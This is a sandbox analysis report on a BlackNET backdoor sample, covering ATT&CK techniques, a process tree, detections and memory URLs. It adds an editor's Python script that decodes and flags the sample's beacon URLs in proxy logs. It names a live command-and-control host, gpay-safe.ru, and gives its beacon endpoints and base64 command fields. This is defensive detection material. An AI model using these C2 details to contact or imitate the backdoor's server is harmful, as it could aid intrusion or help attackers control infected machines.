                  Persistence: Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                  Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                  Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (11); DLL Side-Loading (1)
                  Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                  Discovery: Query Registry (1); Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (21); Remote System Discovery (11); System Network Configuration Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
                  Collection: Input Capture (1); Archive Collected Data (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                  Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (113); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                  Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
                  Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                  Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

                  Behavior Graph

                  Graph ID: 471063 | Sample: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Start date: 25/08/2021 | Architecture: WINDOWS | Score: 100

                  The interactive graph is reproduced here as a process tree. Numbers in parentheses after a process are the graph's count badges (created registry values and created files), kept in the order the graph shows them.

                  Start
                    signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 9 other signatures
                    +-- 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (15, 10)
                    |     network: gpay-safe.ru 91.206.93.216, ports 49724, 49725, 49726 (ASBAXETNRU, Russian Federation)
                    |     dropped: 4054EE21CBFC210489...3129FC0D07A.exe.log (ASCII)
                    |     +-- winhost.exe (15, 6)
                    |     |     network: gpay-safe.ru; 192.168.2.1 (unknown)
                    |     |     signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    |     |     +-- cmd.exe (1)
                    |     |           signatures: Uses ping.exe to sleep
                    |     |           +-- conhost.exe
                    |     |           +-- PING.EXE (1)
                    |     +-- cmd.exe (1)
                    |           network: 1.1.1.1 (CLOUDFLARENETUS, Australia)
                    |           signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                    |           +-- conhost.exe
                    |           +-- PING.EXE (1)
                    +-- 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (1, 7)
                    |     dropped: C:\Users\user\AppData\Local\...\winhost.exe (PE32); C:\Users\user\...\winhost.exe:Zone.Identifier (ASCII)
                    |     +-- winhost.exe
                    |     |     network: gpay-safe.ru
                    |     |     +-- cmd.exe
                    |     |           +-- conhost.exe
                    |     |           +-- PING.EXE
                    |     +-- cmd.exe
                    |           +-- conhost.exe
                    |           +-- PING.EXE
                    +-- winhost.exe
                          signatures: Creates autostart registry keys with suspicious names
                          +-- cmd.exe
                                +-- conhost.exe
                                +-- PING.EXE

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | 69% | Virustotal | -
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | 56% | Metadefender | -
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | 85% | ReversingLabs | ByteCode-MSIL.Backdoor.Blacknet
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | 100% | Avira | TR/Dropper.Gen
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | 100% | Joe Sandbox ML | -

                  Dropped Files

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | 100% | Avira | TR/Dropper.Gen
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | 100% | Joe Sandbox ML | -
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | 56% | Metadefender | -
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | 85% | ReversingLabs | ByteCode-MSIL.Backdoor.Blacknet

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
                  12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
                  19.0.winhost.exe.160000.0.unpack | 100% | Avira | TR/Dropper.Gen
                  19.2.winhost.exe.160000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
                  16.2.winhost.exe.ae0000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
                  0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack | 100% | Avira | TR/Dropper.Gen
                  12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack | 100% | Avira | TR/Dropper.Gen
                  16.0.winhost.exe.ae0000.0.unpack | 100% | Avira | TR/Dropper.Gen
                  8.0.winhost.exe.720000.0.unpack | 100% | Avira | TR/Dropper.Gen
                  8.2.winhost.exe.720000.0.unpack | 100% | Avira | HEUR/AGEN.1106066

                  Domains

                  Source | Detection | Scanner | Label
                  gpay-safe.ru | 7% | Virustotal | -

                  URLs

                  Source | Detection | Scanner | Label
                  http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                  http://www.tiro.com8 | 0% | Avira URL Cloud | safe
                  http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx | 0% | Avira URL Cloud | safe
                  http://www.tiro.com | 0% | URL Reputation | safe
                  http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQx | 0% | Avira URL Cloud | safe
                  http://www.goodfont.co.kr | 0% | URL Reputation | safe
                  http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ | 0% | Avira URL Cloud | safe
                  http://en.w | 0% | URL Reputation | safe
                  http://www.carterandcone.coml | 0% | URL Reputation | safe
                  http://www.sajatypeworks.com | 0% | URL Reputation | safe
                  http://gpay-safe.ru/x/ | 0% | Avira URL Cloud | safe
                  http://www.typography.netD | 0% | URL Reputation | safe
                  http://www.ascendercorp.com/typedesigners.htmlx | 0% | Avira URL Cloud | safe
                  http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                  http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                  http://fontfabrik.com | 0% | URL Reputation | safe
                  http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                  http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ | 0% | Avira URL Cloud | safe
                  http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQx | 0% | Avira URL Cloud | safe
                  http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                  http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                  http://www.sandoll.co.kr | 0% | URL Reputation | safe
                  http://gpay-safe.ru | 0% | Avira URL Cloud | safe
                  http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ | 0% | Avira URL Cloud | safe
                  http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                  http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                  http://www.apache.o | 0% | Avira URL Cloud | safe
                  http://www.sakkal.com | 0% | URL Reputation | safe

                  Domains and IPs

                  Contacted Domains

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  gpay-safe.ru | 91.206.93.216 | true | true | - | unknown

                  Contacted URLs

                  Name | Malicious | Antivirus Detection | Reputation
                  http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ | true | Avira URL Cloud: safe | unknown
                  http://gpay-safe.ru/x/ | true | Avira URL Cloud: safe | unknown
                  http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ | true | Avira URL Cloud: safe | unknown
                  http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ | true | Avira URL Cloud: safe | unknown
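
All four C2 URLs are flagged malicious by the sandbox while the URL-reputation feed still rates them safe, so a proxy-log hunt should key on the beacon shape rather than on reputation. The two receive.php URLs differ only in the command parameter and all three beacons carry the same id / vicID value. Those values are standard base64 sent without padding: SGFDa182NUYxRDNBOQ decodes to HaCk_65F1D3A9 (the victim identifier), T25saW5l to Online and VW5pbnN0YWxs to Uninstall. The following Python is an example added by the editor, not code from the sandbox report or from the BlackNET project: it decodes beacon URLs of this shape and flags them in proxy log lines. The log line layout, the function names and the sample log content are assumptions constructed for the example; the URLs in the sample log are the ones listed above.

```python
import base64
import re
from typing import Optional
from urllib.parse import urlsplit

# Script endpoints seen in the contacted-URL list of this report.
BLACKNET_ENDPOINTS = {"getCommand.php", "receive.php"}

# Query keys that carried base64 in the observed beacons (assumption: the
# same keys are used by other builds of this client).
B64_PARAMS = ("id", "vicID", "command")


def b64_decode_unpadded(value: str) -> Optional[str]:
    """Decode standard base64 that the client sends without '=' padding.

    Returns None for anything that is not clean base64 or does not decode
    to printable ASCII, so stray bytes (e.g. the trailing 'x' seen in the
    memory-string variants of these URLs) are not reported as text.
    """
    if not re.fullmatch(r"[A-Za-z0-9+/]+", value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def split_query(query: str) -> dict:
    """Split a query string by hand.

    urllib.parse.parse_qs would map '+' to a space and percent-decode, which
    corrupts values written in the base64 alphabet ('+' and '/').
    """
    fields = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            fields.setdefault(key, value)
    return fields


def parse_blacknet_beacon(url: str) -> Optional[dict]:
    """Return the decoded fields of a BlackNET-style beacon URL, or None.

    Shapes observed in the report:
      <base>/getCommand.php?id=<b64 victim id>
      <base>/receive.php?command=<b64 command>&vicID=<b64 victim id>
    """
    parts = urlsplit(url)
    endpoint = parts.path.rsplit("/", 1)[-1]
    if endpoint not in BLACKNET_ENDPOINTS:
        return None
    query = split_query(parts.query)
    victim_raw = query.get("id") or query.get("vicID")
    if victim_raw is None:
        return None  # look-alike path without a victim id: not a beacon
    command_raw = query.get("command")
    return {
        "host": parts.hostname,
        "endpoint": endpoint,
        "victim_id": b64_decode_unpadded(victim_raw),
        "command": b64_decode_unpadded(command_raw) if command_raw else None,
        "raw": {k: v for k, v in query.items() if k in B64_PARAMS},
    }


def scan_proxy_log(lines) -> list:
    """Flag beacons in log lines laid out as '<time> <client> <method> <url>'
    (a constructed layout; adapt the field index to the real proxy format)."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        beacon = parse_blacknet_beacon(fields[3])
        if beacon is not None:
            hits.append({"time": fields[0], "client": fields[1], **beacon})
    return hits


# Constructed log lines; the URLs are the ones the sandbox observed.
SAMPLE_LOG = [
    "2021-08-25T10:00:01Z 192.168.2.10 GET http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ",
    "2021-08-25T10:00:02Z 192.168.2.10 GET http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ",
    "2021-08-25T10:00:03Z 192.168.2.11 GET http://www.apache.org/licenses/LICENSE-2.0",
    "2021-08-25T10:05:00Z 192.168.2.10 GET http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["endpoint"],
              "victim=%s command=%s" % (hit["victim_id"], hit["command"]))
```

The decoder keeps the raw query values alongside the decoded ones so that a hit can be matched back to the exact string in the proxy log; the victim id is the field to pivot on, since it stays constant across the getCommand.php poll and the receive.php status posts.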

                  URLs from Memory and Binaries

                  Each entry lists the URL, the memory dumps it was found in (Source), the sandbox verdict (Malicious), any antivirus URL verdict, and the reputation rating.

                  http://www.apache.org/licenses/LICENSE-2.0
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://www.fontbureau.com
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://www.fontbureau.com/designersG
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://www.fontbureau.com/designers/?
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://www.founder.com.cn/cn/bThe
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.tiro.com8
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.647017703.000000001BECF000.00000004.00000001.sdmp
                      Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown
                  http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp
                      Malicious: true | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown
                  http://www.fontbureau.com/designers?
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://www.tiro.com
                      Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.fontbureau.com/designers
                      Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQx
                      Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp
                      Malicious: true | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown
                  http://www.goodfont.co.kr
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.fontbureau.com/designersP
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651132557.000000001BED7000.00000004.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://en.w
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.645343119.000000001BE94000.00000004.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.carterandcone.coml
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.sajatypeworks.com
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.typography.netD
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.ascendercorp.com/typedesigners.htmlx
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.649141258.000000001BE94000.00000004.00000001.sdmp
                      Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown
                  http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://www.founder.com.cn/cn/cThe
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://fontfabrik.com
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.founder.com.cn/cn
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.fontbureau.com/designers/frere-user.html
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651567513.000000001BED7000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQx
                      Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp
                      Malicious: true | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown
                  http://www.fontbureau.com/designers/cabarga.html
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651883264.000000001BED7000.00000004.00000001.sdmp
                      Malicious: false | Reputation: high
                  http://www.jiyu-kobo.co.jp/
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.galapagosdesign.com/DPlease
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
                  http://www.fontbureau.com/designers8
                      Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp
                      Malicious: false
                                        high
                                        http://www.fonts.com4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.kr4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
